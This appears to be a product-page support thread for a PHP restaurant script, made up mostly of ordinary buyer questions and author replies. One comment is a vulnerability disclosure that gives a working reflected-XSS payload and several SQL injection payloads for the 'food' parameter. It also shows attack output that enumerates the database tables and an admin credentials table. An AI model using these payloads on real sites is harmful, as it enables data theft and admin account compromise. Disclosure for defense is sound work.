4 Support questions or comments

• 
  Jun 7, 2023
  cracker

  This Script is Vulnerable to SQL Injection & Reflected XSS (RXSS)
  
  Author: CraCkEr
  Date: 07/06/2023
  
  
  ## Reflected XSS (RXSS)
  
  Path: /food_details.php
  
  GET parameter 'food' is vulnerable to RXSS
  
  https://www.website/food_details.php?food=e11c0"><script>alert(1)</script>uuf50
  
  ----------------------------------------------------------------------------------------------------------------
  
  ## SQL Injection
  
  Path: /food_details.php
  
  https://www.website/food_details.php?food=[SQLI]
  
  
  GET parameter 'food' is vulnerable to SQL Injection
  
  ---
  Parameter: food (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 17 columns
  Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  ---
  
  
  [+] Starting the Attack
  
  fetching current database
  current database: 'sagor_****_restu'
  
  
  fetching tables
  
  [34 tables]
  +--------------------------+
  | add_to_cart_view |
  | admin_url |
  | contact_manage |
  | currencies |
  | customer_info |
  | delivery_live_status |
  | expense_manage |
  | food_category |
  | food_dish_manage |
  | food_dish_vari_man |
  | food_field_variant |
  | food_field_variant_value |
  | food_order_confirm |
  | food_review |
  | food_sub_category |
  | food_tag |
  | gallery_manage |
  | hall_manage |
  | income_manage |
  | kitchen_live_sta |
  | menu_manage |
  | opening_manage |
  | order_accounts |
  | order_other_address |
  | page_manage |
  | payment_gateway |
  | shipping_charge |
  | site_setting |
  | slider_manage |
  | social_manage |
  | sup_ad_log |
  | table_book |
  | table_manage |
  | team_manage |
  +--------------------------+
  
  
  fetching columns for table 'sup_ad_log'
  
  [5 columns]
  +----------------+--------------+
  | Column | Type |
  +----------------+--------------+
  | status | varchar(100) |
  | id | int(11) |
  | sup_admin_name | varchar(100) |
  | sup_pass | varchar(100) |
  | sup_user | varchar(100) |
  +----------------+--------------+
  
  
  [-] Done
  
  

• 
  Oct 20, 2022
  Akira666 Purchased

  Hi, I want to buy this but as I tried the demo, I can't seems to checkout and as well as add a product on the card. When I try to add it shows successful but the cart is empty.

• 
  Jun 30, 2020
  finplanned

  1. Can we add new pages ?
  2. CAn we add sub-menu pages to the main menu and to how many levels down it can go?
  3. When do you plan to have next update?
  4. What are the upcoming updates?
  Await your response.
  
• 
  Jul 7, 2020
  sagordpi Author

  Hi,
  Sorry for late reply I was in vacation.Here is your answer.
  Answer :
  1) No
  2)No
  3) Release Laravel Version , Backend POS System for Restaurant and more .
  4) We will update it within one month with more advance features .
  Thanks

• 
  Apr 9, 2020
  influx

  It looks like the links for the front-end and administration demos are not working. Do you have new links so I can test this out?
• View 2 more replies
• 
  Apr 9, 2020
  sagordpi Author

  Now Its ok please visit : https://expertitbd.com/CODESTER/expert-restaurant/
  Some Features are disable for security reason .You will get full version after purchase . Thanks
• 
  May 1, 2020
  sagordpi Author

  Now the full version is live for test you can check it now here
  https://expertitbd.com/codester/expert-restaurant/
• 
  Jun 13, 2020
  Themeplaza

  good luck with sales.
• 
  Jun 13, 2020
  sagordpi Author

  Thanks for your comments
• 
  Nov 25, 2020
  markbeny

  that link no lenger exist